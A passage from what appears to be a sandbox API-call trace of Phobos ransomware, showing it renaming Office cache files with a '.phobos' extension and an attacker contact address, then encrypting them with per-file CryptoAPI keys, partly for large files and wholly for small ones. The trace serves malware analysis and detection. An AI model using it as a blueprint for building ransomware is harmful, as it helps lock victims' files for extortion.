pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa2ea58) returned 1 [0134.352] CryptSetKeyParam (hKey=0xa2ea58, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0134.352] CryptEncrypt (in: hKey=0xa2ea58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0134.368] CryptDestroyKey (hKey=0xa2ea58) returned 1 [0134.368] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0134.368] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0134.381] SetEndOfFile (hFile=0x148) returned 1 [0134.383] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0134.383] WriteFile (in: hFile=0x148, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0134.385] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0134.385] WriteFile (in: hFile=0x148, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0134.385] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0134.385] WriteFile (in: hFile=0x148, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0134.449] CloseHandle (hObject=0x148) returned 1 [0137.727] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0137.727] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0137.729] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=70361744) returned 1 [0137.729] CloseHandle (hObject=0x134) returned 1 [0137.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab")) returned 0x2020 [0137.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0137.729] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0137.729] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0137.729] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0137.729] ReadFile (in: hFile=0x134, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0140.395] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0140.395] ReadFile (in: hFile=0x134, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0141.188] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0141.188] ReadFile (in: hFile=0x134, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0142.548] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32d28) returned 1 [0142.548] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0142.549] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0142.555] CryptDestroyKey (hKey=0xa32d28) returned 1 [0142.555] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0142.555] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0142.567] SetEndOfFile (hFile=0x134) returned 1 [0143.718] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0143.718] WriteFile (in: hFile=0x134, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0143.733] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0143.733] WriteFile (in: hFile=0x134, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0143.734] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0143.734] WriteFile (in: hFile=0x134, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0143.735] CloseHandle (hObject=0x134) returned 1 [0145.619] SetEvent (hEvent=0xe8) returned 1 [0145.621] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0145.621] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0145.621] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2865664) returned 1 [0145.621] CloseHandle (hObject=0x134) returned 1 [0145.621] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi")) returned 0x2020 [0145.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0145.622] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0145.622] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0145.622] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0145.622] ReadFile (in: hFile=0x134, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0145.673] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0145.673] ReadFile (in: hFile=0x134, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0147.021] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0147.021] ReadFile (in: hFile=0x134, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0147.043] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32da8) returned 1 [0147.043] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0147.044] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0147.050] CryptDestroyKey (hKey=0xa32da8) returned 1 [0147.050] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0147.050] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0147.392] SetEndOfFile (hFile=0x134) returned 1 [0147.393] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0147.393] WriteFile (in: hFile=0x134, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0147.395] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0147.395] WriteFile (in: hFile=0x134, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0147.398] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0147.398] WriteFile (in: hFile=0x134, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0147.399] CloseHandle (hObject=0x134) returned 1 [0148.007] SetEvent (hEvent=0xe8) returned 1 [0148.007] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0148.007] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0148.008] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2522624) returned 1 [0148.008] CloseHandle (hObject=0x134) returned 1 [0148.008] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi")) returned 0x2020 [0148.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0148.008] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0148.008] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0148.008] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0148.009] ReadFile (in: hFile=0x134, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0148.056] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0148.056] ReadFile (in: hFile=0x134, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0148.069] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0148.070] ReadFile (in: hFile=0x134, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0148.088] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa327e8) returned 1 [0148.088] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0148.088] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0148.096] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.096] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0148.096] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0148.397] SetEndOfFile (hFile=0x134) returned 1 [0148.397] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0148.397] WriteFile (in: hFile=0x134, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0148.399] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0148.399] WriteFile (in: hFile=0x134, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0148.403] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0148.403] WriteFile (in: hFile=0x134, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0148.405] CloseHandle (hObject=0x134) returned 1 [0148.405] SetEvent (hEvent=0xe8) returned 1 [0148.405] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0148.405] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.486] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=875520) returned 1 [0148.486] CloseHandle (hObject=0x18c) returned 1 [0148.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 0x2020 [0148.486] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.486] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.486] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0148.486] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0148.487] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.487] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32d68) returned 1 [0148.487] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0148.487] ReadFile (in: hFile=0x18c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xd5c00, lpOverlapped=0x0) returned 1 [0148.986] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd5c10, dwBufLen=0xd5c10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd5c10) returned 1 [0148.993] WriteFile (in: hFile=0x138, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xd5c10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xd5c10, lpOverlapped=0x0) returned 1 [0149.020] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0149.020] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0149.020] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0149.020] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.020] WriteFile (in: hFile=0x138, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0149.020] CryptDestroyKey (hKey=0xa32d68) returned 1 [0149.020] CloseHandle (hObject=0x18c) returned 1 [0149.020] CloseHandle (hObject=0x138) returned 1 [0149.021] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 1 [0149.030] SetEvent (hEvent=0xe8) returned 1 [0149.030] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0149.030] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0149.066] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=13642474) returned 1 [0149.066] CloseHandle (hObject=0x14c) returned 1 [0149.066] GetFileAttributesW 